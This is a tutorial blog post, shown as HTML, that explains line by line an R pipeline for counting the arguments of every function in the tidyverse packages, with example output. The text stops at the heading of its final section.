&lt;p&gt;Before we start anything, I’d like to mention that most of the hard work came from &lt;em&gt;nsaunders&lt;/em&gt; and his great blog post &lt;a href="https://nsaunders.wordpress.com/2018/06/22/idle-thoughts-lead-to-r-internals-how-to-count-function-arguments/amp/" rel="external"&gt;Idle thoughts lead to R internals: how to count function arguments&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s get started. The aim of this blog is to count the number of arguments in each function within the packages of the {tidyverse}. First we need to load the necessary packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytext&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we need to grab the relevant {tidyverse} packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tpkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tidyverse_packages&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tpkg[17] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readxl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tpkg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;broom&amp;#34; &amp;#34;cli&amp;#34; &amp;#34;crayon&amp;#34; &amp;#34;dplyr&amp;#34; &amp;#34;dbplyr&amp;#34; &amp;#34;forcats&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’ve had to reset the 17th element to {readxl} as it gets loaded as &lt;code&gt;readxl\n(&amp;gt;=&lt;/code&gt;, which breaks the next block of code. Now we also need to load in the tidyverse packages. Doing this one by one would be a pain, so I’ve used &lt;code&gt;map()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(tpkg, library, character.only &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now for the actual analysis. I’m just going to whack the full code in, then go through it line by line.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tpkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(funcs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)), collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(func, funcs, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(num_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is what the head of &lt;code&gt;pkg&lt;/code&gt; looks like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(pkg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package func num_args&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 broom augment 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 broom augment_columns 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 broom bootstrap 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 broom confint_tidy 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 broom finish_glance 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 broom fix_data_frame 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-counting-arguments-in-the-tidyverse"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="lines-1-4"&gt;Lines &lt;code&gt;1-4&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Lines 1-4 look like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tpkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here we grab the character vector of tidyverse packages, convert it to a tibble and rename the column. We then use &lt;code&gt;rowwise()&lt;/code&gt; so that each later step is evaluated one row, i.e. one package, at a time.&lt;/p&gt;
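&lt;p&gt;As a minimal sketch of why &lt;code&gt;rowwise()&lt;/code&gt; matters, the toy example below counts the objects in two packages that are attached by default. The names &lt;code&gt;toy&lt;/code&gt;, &lt;code&gt;res&lt;/code&gt; and &lt;code&gt;n_objs&lt;/code&gt; are illustrative and not part of the original analysis. Because &lt;code&gt;ls()&lt;/code&gt; expects a single environment name, it has to be called once per row rather than once on the whole column.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;library(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Toy input (assumption): two packages that a default R session attaches
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;toy = tibble(package = c(&amp;#34;stats&amp;#34;, &amp;#34;utils&amp;#34;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# rowwise() makes mutate() evaluate ls() separately for each package
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res = toy %&amp;gt;%
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  rowwise() %&amp;gt;%
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  mutate(n_objs = length(ls(paste0(&amp;#34;package:&amp;#34;, package)))) %&amp;gt;%
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  ungroup()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;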
&lt;h3 id="line-5"&gt;Line 5&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(funcs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)), collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get a character vector of the objects within a package, we use &lt;code&gt;ls(&amp;quot;package:package_name&amp;quot;)&lt;/code&gt;. However, we want to store this as a single string, so we use our old friend &lt;code&gt;paste0()&lt;/code&gt; with &lt;code&gt;collapse = &amp;quot;,&amp;quot;&lt;/code&gt;. We then use &lt;code&gt;mutate()&lt;/code&gt; to attach this to the data frame. Our data frame now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Source: local data frame [6 x 2]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Groups:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package funcs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 broom argument_glossary,augment,augment_columns,bootstrap,column_gloss…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 cli ansi_hide_cursor,ansi_show_cursor,ansi_with_hidden_cursor,bg_bla…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 crayon %+%,bgBlack,bgBlue,bgCyan,bgGreen,bgMagenta,bgRed,bgWhite,bgYell…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 dplyr %&amp;gt;%,add_count,add_count_,add_row,add_rownames,add_tally,add_tall…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 dbplyr add_op_single,as.sql,base_agg,base_no_win,base_odbc_agg,base_odb…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 forcats %&amp;gt;%,as_factor,fct_anon,fct_c,fct_collapse,fct_count,fct_cross,fc…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="lines-6---7"&gt;Lines 6 - 7&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(func, funcs, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As we’ve stored the function names as a single string, we can now apply some {tidytext} to turn our data into long data! We do this using the &lt;code&gt;unnest_tokens()&lt;/code&gt; function. Here we take the &lt;code&gt;funcs&lt;/code&gt; variable and turn it into &lt;code&gt;func&lt;/code&gt; by splitting it on commas with &lt;code&gt;str_split()&lt;/code&gt; from {stringr}; &lt;code&gt;to_lower = FALSE&lt;/code&gt; keeps the function names in their original case. The data now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Source: local data frame [6 x 2]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Groups:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package func&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 broom argument_glossary&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 broom augment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 broom augment_columns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 broom bootstrap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 broom column_glossary&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 broom confint_tidy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="line-8"&gt;Line 8&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, not every object inside a package is a function. We can use &lt;code&gt;is.function()&lt;/code&gt; to test this. However, as our function names are stored as strings, we must wrap them in the &lt;code&gt;get()&lt;/code&gt; function. For instance,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What if we have conflicts in function names? We can also specify the package our function is from, using the argument &lt;code&gt;pos&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:broom&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then use this condition within a &lt;code&gt;filter()&lt;/code&gt; call to remove any objects that aren’t functions.&lt;/p&gt;
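&lt;p&gt;To illustrate what this filter removes, here is a small base R sketch. The vector &lt;code&gt;objs&lt;/code&gt; is a hypothetical selection of names from {base}, chosen only for illustration: &lt;code&gt;letters&lt;/code&gt; and &lt;code&gt;pi&lt;/code&gt; are data objects, whereas &lt;code&gt;paste0&lt;/code&gt; is a function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Hypothetical selection of object names exported by {base}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;objs = c(&amp;#34;letters&amp;#34;, &amp;#34;pi&amp;#34;, &amp;#34;paste0&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Look each name up in the package and test whether it is a function
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_fun = sapply(objs, function(nm) is.function(get(nm, pos = &amp;#34;package:base&amp;#34;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_fun
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## letters      pi  paste0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;##   FALSE   FALSE    TRUE
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;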
&lt;h3 id="lines-9---end"&gt;Lines 9 - end&lt;/h3&gt;
